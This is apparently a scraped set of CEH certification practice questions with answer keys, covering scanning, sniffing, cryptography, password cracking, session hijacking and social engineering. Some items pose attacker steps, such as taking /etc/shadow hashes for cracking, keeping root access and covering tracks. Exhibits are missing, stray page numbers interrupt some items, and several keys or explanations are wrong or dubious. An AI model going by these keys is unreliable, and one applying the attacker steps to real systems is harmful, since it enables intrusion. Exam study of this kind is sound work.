CEH Questions

अब Quizwiz के साथ अपने होमवर्क और परीक्षाओं को एस करें!

697 What type of session hijacking attack is shown in the exhibit? A. Session Sniffing Attack B. Cross-site scripting Attack C. SQL Injection Attack D. Token sniffing Attack

A

570 Pandora is used to attack __________ network operating systems. A. Windows B. UNIX C. Linux D. Netware E. MAC OS

D (Explanation: While there are not lots of tools available to attack Netware, Pandora is one that can be used. 345)

479 Which of the following is a form of penetration testing that relies heavily on human interaction and often involves tricking people into breaking normal security procedures? A. Social Engineering B. Piggybacking C. Tailgating D. Eavesdropping

A

562 DRAG DROP A Successfully Attack by a malicious hacker can divide into five phases, Match the order: 340

341)

128 Which of the following is a client-server tool utilized to evade firewall inspection? A. tcp-over-dns B. kismet C. nikto D. hping

A

129 Which tool is used to automate SQL injections and exploit a database by forcing a given web application to connect to another database controlled by a hacker? A. DataThief B. NetCat C. Cain and Abel D. SQLInjector

A

151 A hacker is attempting to see which IP addresses are currently active on a network. Which NMAP switch would the hacker use? A. -sO B. -sP C. -sS D. -sU

B

260 Which of the following is not considered to be a part of active sniffing? A. MAC Flooding B. ARP Spoofing C. SMAC Fueling D. MAC Duplicating

C

290 If you send a SYN to an open port, what is the correct response?(Choose all correct answers. 174 A. SYN B. ACK C. FIN D. PSH

A,B (Explanation: The proper response is a SYN / ACK. This technique is also known as half-open scanning.)

545 How many bits encryption does SHA-1 use? A. 64 bits B. 128 bits C. 160 bits D. 256 bits

C (Explanation: SHA-1 (as well as SHA-0) produces a 160-bit digest from a message with a maximum length of 264 - 1 bits, and is based on principles similar to those used by Professor Ronald L. Rivest of MIT in the design of the MD4 and MD5 message digest algorithms.)

89 An attacker uses a communication channel within an operating system that is neither designed nor intended to transfer information. What is the name of the communications channel? A. Classified B. Overt C. Encrypted D. Covert

D

708 You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.c What is the hexadecimal value of NOP instruction? A. 0x60 B. 0x80 C. 0x70 D. 0x90

D ( 0x90)

202 Which security strategy requires using several, varying methods to protect IT systems against attacks? A. Defense in depth B. Three-way handshake C. Covert channels D. Exponential backoff algorithm

A

617 What type of Virus is shown here? 372 A. Cavity Virus B. Macro Virus C. Boot Sector Virus D. Metamorphic Virus E. Sparse Infector Virus

E

108 Your are trying the scan a machine located at ABC company's LAN named mail.abc.com. Actually that machine located behind the firewall. Which port is used by nmap to send the TCP synchronize frame to on mail.abc.com? A. 443 B. 80 C. 8080 D. 23

A

214 Which of the following can take an arbitrary length of input and produce a message digest output of 160 bit? A. SHA-1 B. MD5 C. HAVAL D. MD4

A

299 You have several plain-text firewall logs that you must review to evaluate network traffic. You know that in order to do fast, efficient searches of the logs you must use regular expressions. Which command-line utility are you most likely to use? A. Grep B. Notepad C. MS Excel D. Relational Database

A (Explanation: grep is a command-line utility for searching plain-text data sets for lines matching a regular expression. References: https://en.wikipedia.org/wiki/Grep)

65 What is the proper response for a FIN scan if the port is open? A. SYN B. ACK C. FIN D. PSH E. RST F. No response

F (Explanation: Open ports respond to a FIN scan by ignoring the packet in question.)

121 Which of the following tools will scan a network to perform vulnerability checks and compliance auditing? A. NMAP B. Metasploit C. Nessus D. BeEF

C

141 After gaining access to the password hashes used to protect access to a web based application, knowledge of which cryptographic algorithms would be useful to gain access to the application? A. SHA1 B. Diffie-Helman C. RSA D. AES

A

622 What type of session hijacking attack is shown in the exhibit? A. Cross-site scripting Attack B. SQL Injection Attack C. Token sniffing Attack D. Session Fixation Attack

D

494 Which of the following is a restriction being enforced in "white box testing?" A. Only the internal operation of a system is known to the tester B. The internal operation of a system is completely known to the tester C. The internal operation of a system is only partly accessible to the tester D. Only the external operation of a system is accessible to the tester

B

106 An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to compile the newest C++ exploit and name it calc.exe. Which command would the engineer use to accomplish this? A. g++ hackersExploit.cpp -o calc.exe B. g++ hackersExploit.py -o calc.exe C. g++ -i hackersExploit.pl -o calc.exe D. g++ --compile -i hackersExploit.cpp -o calc.exe

A

11 How can rainbow tables be defeated? A. Password salting B. Use of non-dictionary words C. All uppercase character passwords D. Lockout accounts under brute force password cracking attempts

A

113 A company has five different subnets: 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0. How can NMAP be used to scan these adjacent Class C networks? A. NMAP -P 192.168.1-5. B. NMAP -P 192.168.0.0/16 C. NMAP -P 192.168.1.0,2.0,3.0,4.0,5.0 D. NMAP -P 192.168.1/17

A

115 A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would the hacker use? A. -sO B. -sP C. -sS D. -sU

A

132 When using Wireshark to acquire packet capture on a network, which device would enable the capture of all traffic on the wire? A. Network tap B. Layer 3 switch C. Network bridge D. Application firewall

A

158 Which of the following is used to indicate a single-line comment in structured query language (SQL)? A. -- B. || C. %% D. ''

A

410 If there is an Intrusion Detection System (IDS) in intranet, which port scanning technique cannot be used? A. Spoof Scan B. TCP Connect scan C. TCP SYN D. Idle Scan

C

332 The "black box testing" methodology enforces which kind of restriction? A. Only the external operation of a system is accessible to the tester. B. Only the internal operation of a system is known to the tester. C. The internal operation of a system is only partly accessible to the tester. D. The internal operation of a system is completely known to the tester.

A (Explanation: Black-box testing is a method of software testing that examines the functionality of an application without peering into its internal structures or workings. References: https://en.wikipedia.org/wiki/Black-box_testing 189)

135 Which of the following is a hashing algorithm? A. MD5 B. PGP C. DES D. ROT13

A

138 Which tool would be used to collect wireless packet data? A. NetStumbler B. John the Ripper C. Nessus D. Netcat

A

165 The use of technologies like IPSec can help guarantee the following: authenticity, integrity, confidentiality and A. non-repudiation. B. operability. C. security. D. usability.

A

206 A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the Internet. When the technician examines the IP address and default gateway they are both on the 192.168.1.0/24. Which of the following has occurred? A. The gateway is not routing to a public IP address. B. The computer is using an invalid IP address. C. The gateway and the computer are not on the same network. D. The computer is not using a private IP address.

A

221 Which United States legislation mandates that the Chief Executive Officer (CEO) and the Chief Financial Officer (CFO) must sign statements verifying the completeness and accuracy of financial reports? A. Sarbanes-Oxley Act (SOX) B. Gramm-Leach-Bliley Act (GLBA) C. Fair and Accurate Credit Transactions Act (FACTA) D. Federal Information Security Management Act (FISMA)

A

222 How can a policy help improve an employee's security awareness? A. By implementing written security procedures, enabling employee security training, and promoting the benefits of security B. By using informal networks of communication, establishing secret passing procedures, and immediately terminating employees C. By sharing security secrets with employees, enabling employees to share secrets, and establishing a consultative help line D. By decreasing an employee's vacation time, addressing ad-hoc employment clauses, and ensuring that managers know employee strengths

A

232 A certified ethical hacker (CEH) is approached by a friend who believes her husband is cheating. She offers to pay to break into her husband's email account in order to find proof so she can take him to court. What is the ethical response? A. Say no; the friend is not the owner of the account. B. Say yes; the friend needs help to gather evidence C. Say yes; do the job for free D. Say no; make sure that the friend knows the risk she's asking the CEH to take

A

234 As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing. What document describes the specifics of the testing, the associated violations, and essentially protects both the organization's interest and your liabilities as a tester? A. Terms of Engagement B. Project Scope C. Non-Disclosure Agreement D. Service Level Agreement

A

395 You're doing an internal security audit and you want to find out what ports are open on all the servers. What is the best way to find out? A. Scan servers with Nmap B. Physically go to each server C. Scan servers with MBSA D. Telent to every port on each server

A

411 What is correct about digital signatures? A. A digital signature cannot be moved from one signed document to another because it is the hash of the original document encrypted with the private key of the signing party. B. Digital signatures may be used in different documents of the same type C. A digital signature cannot be moved from one signed document to another because it is a plain hash of the document content. D. Digital signatures are issued once for each user and can be used everywhere until they expire

A

438 Which of the following is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. A. Heartbleed Bug B. POODLE C. SSL/TLS Renegotiation Vulnerability D. Shellshock

A

444 It is a short-range wireless communication technology that allows mobile phones, computers and other devices to connect and communicate. This technology intends to replace cables connecting portable devices with high regards to security. A. Bluetooth B. Radio-Frequency Identification C. WLAN D. InfraRed

A

458 What kind of risk will remain even if all theoretically possible safety measures would be applied? A. Residual risk B. Inherent risk C. Impact risk D. Deferred risk

A

463 If you are to determine the attack surface of an organization, which of the following is the BEST thing to do? A. Running a network scan to detect network services in the corporate DMZ B. Reviewing the need for a security clearance for each employee C. Using configuration management to determine when and where to apply security patches D. Training employees on the security policy regarding social engineering

A

491 What would you type on the Windows command line in order to launch the Computer Management Console provided that you are logged in as an admin? A. c:\compmgmt.msc B. c:\gpedit C. c:\ncpa.cpl D. c:\services.msc

A

52 When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router was accessed from the administrator's computer to update the router configuration. What type of an alert is this? A. False positive B. False negative C. True positive D. True negative

A

573 How would you permanently wipe the data in the hard disk? A. wipe -fik /dev/hda1 B. erase -fik /dev/hda1 C. delete -fik /dev/hda1 D. secdel -fik /dev/hda1 346

A

595 TCP/IP Session Hijacking is carried out in which OSI layer? A. Transport layer B. Datalink layer 360 C. Physical Layer D. Network Layer

A

604 Which of the following countermeasure can specifically protect against both the MAC Flood and MAC Spoofing attacks? A. Configure Port Security on the switch B. Configure Port Recon on the switch C. Configure Switch Mapping D. Configure Multiple Recognition on the switch

A

458 You are trying to compromise a Linux Machine and steal the password hashes for cracking with password brute forcing program. Where is the password file kept is Linux? A. /etc/shadow B. /etc/passwd C. /bin/password D. /bin/shadow

A (Explanation: /etc/shadow file stores actual password in encrypted format for user's account with additional properties related to user password i.e. it stores secure user account information. All fields are separated by a colon (:) symbol. It contains one entry per line for each user listed in /etc/passwd file. Topic 19, Evading IDS, Firewalls and Honeypots)

295 What is the process of logging, recording, and resolving events that take place in an organization? A. Incident Management Process B. Security Policy C. Internal Procedure D. Metrics

A (Explanation: The activities within the incident management process include: References: https://en.wikipedia.org/wiki/Incident_management_(ITSM)#Incident_management_procedure)

406 An attacker attaches a rogue router in a network. He wants to redirect traffic to a LAN attached to his router as part of a man-in-the-middle attack. What measure on behalf of the legitimate admin can mitigate this attack? A. Only using OSPFv3 will mitigate this risk. B. Make sure that legitimate network routers are configured to run routing protocols with authentication. C. Redirection of the traffic cannot happen unless the admin allows it explicitly. D. Disable all routing protocols and only use static routes.

B

416 Which of the following areas is considered a strength of symmetric key cryptography when compared with asymmetric algorithms? A. Scalability B. Speed C. Key distribution D. Security

B

437 An enterprise recently moved to a new office and the new neighborhood is a little risky. The CEO wants to monitor the physical perimeter and the entrance doors 24 hours. What is the best option to do this job? A. Use fences in the entrance doors. B. Install a CCTV with cameras pointing to the entrance doors and the street. C. Use an IDS in the entrance doors and install some of them near the corners. D. Use lights in all the entrance doors and along the company's perimeter.

B

481 You've just gained root access to a Centos 6 server after days of trying. What tool should you use to maintain access? A. Disable Key Services B. Create User Account C. Download and Install Netcat D. Disable IPTables

B

109 One advantage of an application-level firewall is the ability to A. filter packets at the network level. B. filter specific commands, such as http:post. C. retain state information for each packet. D. monitor tcp handshaking.

B

194 Which of the following is an example of IP spoofing? A. SQL injections B. Man-in-the-middle C. Cross-site scripting D. ARP poisoning

B

21 Your company trainee Sandra asks you which are the four existing Regional Internet Registry (RIR's)? A. APNIC, PICNIC, ARIN, LACNIC B. RIPE NCC, LACNIC, ARIN, APNIC C. RIPE NCC, NANIC, ARIN, APNIC D. RIPE NCC, ARIN, APNIC, LATNIC 13

B (Explanation: All other answers include non existing organizations (PICNIC, NANIC, LATNIC). See http://www.arin.net/library/internet_info/ripe.html)

91 What does ICMP (type 11, code 0) denote? A. Unknown Type B. Time Exceeded C. Source Quench D. Destination Unreachable

B (Explanation: An ICMP Type 11, Code 0 means Time Exceeded [RFC792], Code 0 = Time to Live exceeded in Transit and Code 1 = Fragment Reassembly Time Exceeded.)

671 TCP packets transmitted in either direction after the initial three-way handshake will have which of the following bit set? A. SYN flag B. ACK flag C. FIN flag D. XMAS flag

B

166 Exhibit: 98 Based on the following extract from the log of a compromised machine, what is the hacker really trying to steal? A. har.txt B. SAM file C. wwwroot D. Repair file

B (Explanation: He is actually trying to get the file har.txt but this file contains a copy of the SAM file. 99)

193 In the OSI model, where does PPTP encryption take place? A. Transport layer B. Application layer C. Data link layer D. Network layer

C

215 Which element of Public Key Infrastructure (PKI) verifies the applicant? A. Certificate authority B. Validation authority C. Registration authority D. Verification authority

C

28 What information should an IT system analysis provide to the risk assessor? A. Management buy-in B. Threat statement C. Security architecture D. Impact analysis

C

396 Jimmy is standing outside a secure entrance to a facility. He is pretending to have a tense conversation on his cell phone as an authorized employee badges in. Jimmy, while still on the phone, grabs the door as it begins to close. What just happened? A. Phishing B. Whaling C. Tailgating D. Masquerading

C

77 Which of the following cryptography attack methods is usually performed without the use of a computer? A. Ciphertext-only attack B. Chosen key attack C. Rubber hose attack D. Rainbow table attack

C

87 Which type of scan measures a person's external features through a digital video camera? A. Iris scan B. Retinal scan C. Facial recognition scan D. Signature kinetics scan

C

668 Lee is using Wireshark to log traffic on his network. He notices a number of packets being directed to an internal IP from an outside IP where the packets are ICMP and their size is around 65,536 bytes. What is Lee seeing here? A. Lee is seeing activity indicative of a Smurf attack. B. Most likely, the ICMP packets are being sent in this manner to attempt IP spoofing. C. Lee is seeing a Ping of death attack. D. This is not unusual traffic, ICMP packets can be of any size.

C

161 A company is using Windows Server 2003 for its Active Directory (AD). What is the most efficient way to crack the passwords for the AD users? A. Perform a dictionary attack. B. Perform a brute force attack. C. Perform an attack with a rainbow table D. Perform a hybrid attack.

C

171 Advanced encryption standard is an algorithm used for which of the following? A. Data integrity B. Key discovery C. Bulk data encryption D. Key recovery

C

18 Which of the following is a detective control? A. Smart card authentication B. Security policy C. Audit trail D. Continuity of operations plan

C

180 To reduce the attack surface of a system, administrators should perform which of the following processes to remove unnecessary software, services, and insecure configuration settings? A. Harvesting B. Windowing C. Hardening D. Stealthing

C

232 After an attacker has successfully compromised a remote computer, what would be one of the last steps that would be taken to ensure that the compromise is not traced back to the source of the problem? A. Install pactehs B. Setup a backdoor C. Cover your tracks D. Install a zombie for DDOS

C (Explanation: As a hacker you don't want to leave any traces that could lead back to you.)

344 ____________ will let you assume a users identity at a dynamically generated web page or site. A. SQL attack B. Injection attack C. Cross site scripting D. The shell attack E. Winzapper

C (Explanation: Cross site scripting is also referred to as XSS or CSS. You must know the user is online and you must scam that user into clicking on a link that you have sent in order for this hack attack to work.)

174 Jonathan being a keen administrator has followed all of the best practices he could find on securing his Windows Server. He renamed the Administrator account to a new name that can't be easily guessed but there remain people who attempt to compromise his newly renamed administrator account. How can a remote attacker decipher the name of the administrator account if it has been renamed? A. The attacker guessed the new name B. The attacker used the user2sid program C. The attacker used to sid2user program D. The attacker used NMAP with the V option

C (Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and more. These utilities do not exploit a bug but call the functions LookupAccountName and LookupAccountSid respectively. What is more these can be called against a remote machine without providing logon credentials save those needed for a null session connection.)

550 What are the different between SSL and S-HTTP? A. SSL operates at the network layer and S-HTTP operates at the application layer B. SSL operates at the application layer and S-HTTP operates at the network layer C. SSL operates at transport layer and S-HTTP operates at the application layer 334 D. SSL operates at the application layer and S-HTTP operates at the transport layer

C (Explanation: Whereas SSL is designed to establish a secure connection between two computers, S-HTTP is designed to send individual messages securely. S-HTTP is defined in RFC 2660)

55 You are scanning into the target network for the first time. You find very few conventional ports open. When you attempt to perform traditional service identification by connecting to the open ports, it yields either unreliable or no results. You are unsure of what protocols are being used. You need to discover as many different protocols as possible. Which kind of scan would you use to do this? A. Nmap with the -sO (Raw IP packets) switch B. Nessus scan with TCP based pings C. Nmap scan with the -sP (Ping scan) switch D. Netcat scan with the -u -e switches

A (Explanation: Running Nmap with the -sO switch will do a IP Protocol Scan. The IP protocol scan is a bit different than the other nmap scans. The IP protocol scan is searching for additional IP protocols in use by the remote station, such as ICMP, TCP, and UDP. If a router is scanned, additional IP protocols such as EGP or IGP may be identified. 34)

105 Bob is a Junior Administrator at ABC.com is searching the port number of POP3 in a file. The partial output of the file is look like: In which file he is searching? 62 A. services B. protocols C. hosts D. resolve.conf

A (Explanation: The port numbers on which certain standard services are offered are defined in the RFC 1700 Assigned Numbers. The /etc/services file enables server and client programs to convert service names to these numbers -ports. The list is kept on each host and it is stored in the file /etc/services.)

24 Which of the following tools are used for footprinting?(Choose four. A. Sam Spade B. NSLookup C. Traceroute D. Neotrace E. Cheops 15

A,B,C,D (Explanation: All of the tools listed are used for footprinting except Cheops.)

105 To send a PGP encrypted message, which piece of information from the recipient must the sender have before encrypting the message? A. Recipient's private key B. Recipient's public key C. Master encryption key D. Sender's public key

B

157 Which tool can be used to silently copy files from USB devices? A. USB Grabber B. USB Dumper C. USB Sniffer D. USB Snoopy

B

428 Which type of security feature stops vehicles from crashing through the doors of a building? A. Turnstile B. Bollards C. Mantrap D. Receptionist

B

85 A security policy will be more accepted by employees if it is consistent and has the support of A. coworkers. B. executive management. C. the security officer. D. a supervisor.

B

161 What port number is used by LDAP protocol? A. 110 B. 389 C. 445 D. 464

B (Explanation: Active Directory and Exchange use LDAP via TCP port 389 for clients.)

240 Sniffing is considered an active attack. A. True B. False

B (Explanation: Sniffing is considered a passive attack.)

567 Which is the Novell Netware Packet signature level used to sign all packets ? A. 0 B. 1 C. 2 D. 3

D (Explanation: Level 0 is no signature, Level 3 is communication using signature only.)

493 What is a primary advantage a hacker gains by using encryption or programs such as Loki? A. It allows an easy way to gain administrator rights B. It is effective against Windows computers C. It slows down the effective response of an IDS D. IDS systems are unable to decrypt it E. Traffic will not be modified in transit

D (Explanation: Because the traffic is encrypted, an IDS cannot understand it or evaluate the payload.)

404 Internet Protocol Security IPSec is actually a suite of protocols. Each protocol within the suite provides different functionality. Collective IPSec does everything except. A. Protect the payload and the headers B. Authenticate C. Encrypt D. Work at the Data Link Layer

D

483 The following are types of Bluetooth attack EXCEPT_____? A. Bluejacking B. Bluesmaking C. Bluesnarfing D. Bluedriving

D

484 Which of the following is the BEST approach to prevent Cross-site Scripting (XSS) flaws? A. Use digital certificates to authenticate a server prior to sending data B. Verify access right before allowing access to protected information and UI controls. C. Verify access right before allowing access to protected information and UI controls. D. Validate and escape all information sent to a server.

D

529 Choose one of the following pseudo codes to describe this statement: If we have written 200 characters to the buffer variable, the stack should stop because it cannot hold any more data. A. If (I > 200) then exit (1) B. If (I < 200) then exit (1) C. If (I <= 200) then exit (1) D. If (I >= 200) then exit (1)

D

10 Passive reconnaissance involves collecting information through which of the following? A. Social engineering B. Network traffic sniffing C. Man in the middle attacks D. Publicly accessible sources

D

126 A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester pivot using Metasploit? A. Issue the pivot exploit and set the meterpreter. B. Reconfigure the network settings in the meterpreter. C. Set the payload to propagate through the meterpreter. D. Create a route statement in the meterpreter.

D

195 For messages sent through an insecure channel, a properly implemented digital signature gives the receiver reason to believe the message was sent by the claimed sender. While using a digital signature, the message digest is encrypted with which key? A. Sender's public key B. Receiver's private key C. Receiver's public key D. Sender's private key

D

213 Which cipher encrypts the plain text digit (bit or byte) one by one? A. Classical cipher B. Block cipher C. Modern cipher D. Stream cipher

D

405 While probing an organization you discover that they have a wireless network. From your attempts to connect to the WLAN you determine that they have deployed MAC filtering by using ACL on the access points. What would be the easiest way to circumvent and communicate on the WLAN? A. Attempt to crack the WEP key using Airsnort. B. Attempt to brute force the access point and update or delete the MAC ACL. C. Steel a client computer and use it to access the wireless network. D. Sniff traffic if the WLAN and spoof your MAC address to one that you captured.

D (Explanation: The easiest way to gain access to the WLAN would be to spoof your MAC address to one that already exists on the network. 243)

661 Which of the following tool would be considered as Signature Integrity Verifier (SIV)? 400 A. Nmap B. SNORT C. VirusSCAN D. Tripwire

D

145 What is the proper response for a NULL scan if the port is open? A. SYN B. ACK C. FIN D. PSH E. RST F. No response

F (Explanation: A NULL scan will have no response if the port is open.)

67 What is the proper response for a X-MAS scan if the port is open? A. SYN B. ACK C. FIN D. PSH E. RST F. No response

F (Explanation: Closed ports respond to a X-MAS scan by ignoring the packet.)

705 ViruXine.W32 virus hides their presence by changing the underlying executable code. This Virus code mutates while keeping the original algorithm intact, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. Here is a section of the Virus code: What is this technique called? A. Polymorphic Virus B. Metamorphic Virus C. Dravidic Virus D. Stealth Virus

A)

116 ICMP ping and ping sweeps are used to check for active systems and to check A. if ICMP ping traverses a firewall. B. the route that the ICMP ping took. C. the location of the switchport in relation to the ICMP ping. D. the number of hops an ICMP ping takes to reach a destination.

A

36 22 Exhibit Joe Hacker runs the hping2 hacking tool to predict the target host's sequence numbers in one of the hacking session. What does the first and second column mean? Select two. A. The first column reports the sequence number B. The second column reports the difference between the current and last sequence number C. The second column reports the next sequence number D. The first column reports the difference between current and last sequence number

A,B

78 Which of the following is a strong post designed to stop a car? A. Gate B. Fence C. Bollard D. Reinforced rebar

C

12 The following is a sample of output from a penetration tester's machine targeting a machine with the IP address of 192.168.1.106: What is most likely taking place? A. 8 Ping sweep of the 192.168.1.106 network B. Remote service brute force attempt C. Port scan of 192.168.1.106 D. Denial of service attack on 192.168.1.106

B

737 You are trying to hijack a telnet session from a victim machine with IP address 10.0.0.5 to Cisco router at 10.0.0.1. You sniff the traffic and attempt to predict the sequence and acknowledgement numbers to successfully hijack the telnet session. Here is the captured data in tcpdump. What are the next sequence and acknowledgement numbers that the router will send to the victim machine? A. Sequence number: 82980070 Acknowledgement number: 17768885A. B. Sequence number: 17768729 Acknowledgement number: 82980070B. C. Sequence number: 87000070 Acknowledgement number: 85320085C. D. Sequence number: 82980010 Acknowledgement number: 17768885D.

A ( Sequence number: 82980070 Acknowledgement number: 17768885A.)

712 429 In Trojan terminology, what is a covert channel? A. A channel that transfers information within a computer system or network in a way that violates the security policy B. A legitimate communication path within a computer system or network for transfer of data C. It is a kernel operation that hides boot processes and services to mask detection D. It is Reverse tunneling technique that uses HTTPS protocol instead of HTTP protocol to establish connections

A)

748 Here is the ASCII Sheet. You want to guess the DBO username juggyboy (8 characters) using Blind SQL Injection technique. What is the correct syntax? A. Option A B. Option B C. Option C D. Option D

A)

758 Trojan horse attacks pose one of the most serious threats to computer security. The image below shows different ways a Trojan can get into a system. Which are the easiest and most convincing ways to infect a computer? A. IRC (Internet Relay Chat) B. Legitimate "shrink-wrapped" software packaged by a disgruntled employee C. NetBIOS (File Sharing) D. Downloading files, games and screensavers from Internet sites

B)

309 What are the six types of social engineering?(Choose six). A. Spoofing B. Reciprocation C. Social Validation D. Commitment E. Friendship F. Scarcity G. Authority H. Accountability

B,C,D,E,F,G (Explanation: All social engineering is performed by taking advantage of human nature. For indepth information on the subject review, read Robert Cialdini's book, Influence: Science and Practice.)

739 Web servers are often the most targeted and attacked hosts on organizations' networks. Attackers may exploit software bugs in the Web server, underlying operating system, or active content to gain unauthorized access. Identify the correct statement related to the above Web Server installation? A. Lack of proper security policy, procedures and maintenance B. Bugs in server software, OS and web applications C. Installing the server with default settings D. Unpatched security flaws in the server software, OS and applications

C)

68 What flags are set in a X-MAS scan?(Choose all that apply. A. SYN 41 B. ACK C. FIN D. PSH E. RST F. URG

C,D,F (Explanation: FIN, URG, and PSH are set high in the TCP packet for a X-MAS scan)

337 On a default installation of Microsoft IIS web server, under which privilege does the web server software execute? A. Everyone B. Guest C. System D. Administrator

C (Explanation: If not changed during the installation, IIS will execute as Local System with way to high privileges.)

72 Which of the following types of firewall inspects only header information in network traffic? A. Packet filter B. Stateful inspection C. Circuit-level gateway D. Application-level gateway

A

639 What is a sniffing performed on a switched network called? A. Spoofed sniffing B. Passive sniffing C. Direct sniffing D. Active sniffing

D

101 Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common? A. They are written in Java B. They send alerts to security monitors. C. They use the same packet analysis engine D. They use the same packet capture utility.

D

61 _______ is one of the programs used to wardial. A. DialIT B. Netstumbler C. TooPac D. Kismet E. ToneLoc

E (Explanation: ToneLoc is one of the programs used to wardial. While this is considered an "old school" technique, it is still effective at finding backdoors and out of band network entry points.)

72 What is the disadvantage of an automated vulnerability assessment tool? A. Ineffective B. Slow C. Prone to false positives D. Prone to false negatives E. Noisy

E (Explanation: Vulnerability assessment tools perform a good analysis of system vulnerabilities; however, they are noisy and will quickly trip IDS systems.)

377 Which of these is capable of searching for and locating rogue access points? A. HIDS B. WISS C. WIPS D. NIDS

C

460 You are attempting to map out the firewall policy for an organization. You discover your target system is one hop beyond the firewall. Using hping2, you send SYN packets with the exact TTL of the target system starting at port 1 and going up to port 1024. What is this process known as? A. Footprinting B. Firewalking C. Enumeration D. Idle scanning

B (Explanation: Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. More over, it can determine whether packets with various control information can pass through a given gateway.)

488 To scan a host downstream from a security gateway, Firewalking: A. Sends a UDP-based packet that it knows will be blocked by the firewall to determine how specifically the firewall responds to such packets B. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway C. Sends an ICMP ''administratively prohibited'' packet to determine if the gateway will drop the packet without comment. D. Assesses the security rules that relate to the target system before it sends packets to any hops on the route to the gateway

B (Explanation: Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. More over, it can determine whether packets with various control information can pass through a given gateway.)

294 Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests, so as to prevent legitimate users from gaining access. What type of attack is Henry using? A. Henry is executing commands or viewing data outside the intended target path B. Henry is using a denial of service attack which is a valid threat used by an attacker C. Henry is taking advantage of an incorrect configuration that leads to access with higher-thanexpected privilege D. Henry uses poorly designed input validation routines to create or alter commands to gain access to unintended data or execute commands

B (Explanation: Henry's intention is to perform a DoS attack against his target, possibly a DDoS attack. He uses systems other than his own to perform the attack in order to cover the tracks back to him and to get more "punch" in the DoS attack if he uses multiple systems.)

56 What ICMP message types are used by the ping command? A. Timestamp request (13) and timestamp reply (14) B. Echo request (8) and Echo reply (0) C. Echo request (0) and Echo reply (1) D. Ping request (1) and Ping reply (2)

B (Explanation: ICMP Type 0 = Echo Reply, ICMP Type 8 = Echo)

27 While footprinting a network, what port/service should you look for to attempt a zone transfer? A. 53 UDP B. 53 TCP C. 25 UDP D. 25 TCP E. 161 UDP F. 22 TCP G. 60 TCP

B (Explanation: IF TCP port 53 is detected, the opportunity to attempt a zone transfer is there.)

126 74 You are conducting an idlescan manually using HPING2. During the scanning process, you notice that almost every query increments the IPID- regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Which of he following options would be a possible reason? A. Hping2 can't be used for idlescanning B. The Zombie you are using is not truly idle C. These ports are actually open on the target system D. A stateful inspection firewall is resetting your queries

B (Explanation: If the IPID increments more than one value that means that there has been network traffic between the queries so the zombie is not idle.)

44 War dialing is a very old attack and depicted in movies that were made years ago. Why would a modem security tester consider using such an old technique? A. It is cool, and if it works in the movies it must work in real life. B. It allows circumvention of protection mechanisms by being on the internal network. C. It allows circumvention of the company PBX. D. A good security tester would not use such a derelict technique.

B (Explanation: If you are lucky and find a modem that answers and is connected to the target network, it usually is less protected (as only employees are supposed to know of its existence) and once connected you don't need to take evasive actions towards any firewalls or IDS.)

11 ABC.com is legally liable for the content of email that is sent from its systems, regardless of whether the message was sent for private or business-related purpose. This could lead to prosecution for the sender and for the company's directors if, for example, outgoing email was found to contain material that was pornographic, racist or likely to incite someone to commit an act of terrorism. You can always defend yourself by "ignorance of the law" clause. A. True B. False

B (Explanation: Ignorantia juris non excusat or Ignorantia legis neminem excusat (Latin for "ignorance of the law does not excuse" or "ignorance of the law excuses no one") is a public policy holding that a person who is unaware of a law may not escape liability for violating that law merely because he or she was unaware of its content; that is, persons have presumed knowledge of the law. Presumed knowledge of the law is the principle in jurisprudence that one is bound by a law even if one does not know of it. It has also been defined as the "prohibition of ignorance of the law". Topic 2, Footprinting)

181 A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges which carry user logons. The user is plugged into a hub with 23 other systems. However, he is unable to capture any logons though he knows that other users are logging in. What do you think is the most likely reason behind this? A. There is a NIDS present on that segment. B. Kerberos is preventing it. C. Windows logons cannot be sniffed. D. L0phtcrack only sniffs logons to web servers.

B (Explanation: In a Windows 2000 network using Kerberos you normally use pre-authentication and the user password never leaves the local machine so it is never exposed to the network so it should not be able to be sniffed.)

283 What is the goal of a Denial of Service Attack? A. Capture files from a remote computer. B. Render a network or computer incapable of providing normal service. C. Exploit a weakness in the TCP stack. D. Execute service at PS 1009.

B (Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB).)

259 What port number is used by Kerberos protocol? 156 A. 44 B. 88 C. 419 D. 487

B (Explanation: Kerberos traffic uses UDP/TCP protocol source and destination port 88.)

571 What is the name of the software tool used to crack a single account on Netware Servers using a dictionary attack? A. NPWCrack B. NWPCrack C. NovCrack D. CrackNov E. GetCrack

B (Explanation: NWPCrack is the software tool used to crack single accounts on Netware servers.)

104 While doing fast scan using -F option, which file is used to list the range of ports to scan by nmap? A. services B. nmap-services C. protocols D. ports

B (Explanation: Nmap uses the nmap-services file to provide additional port detail for almost every scanning method. Every time a port is referenced, it's compared to an available description in this support file. If the nmap-services file isn't available, nmap reverts to the /etc/services file applicable for the current operating system.)

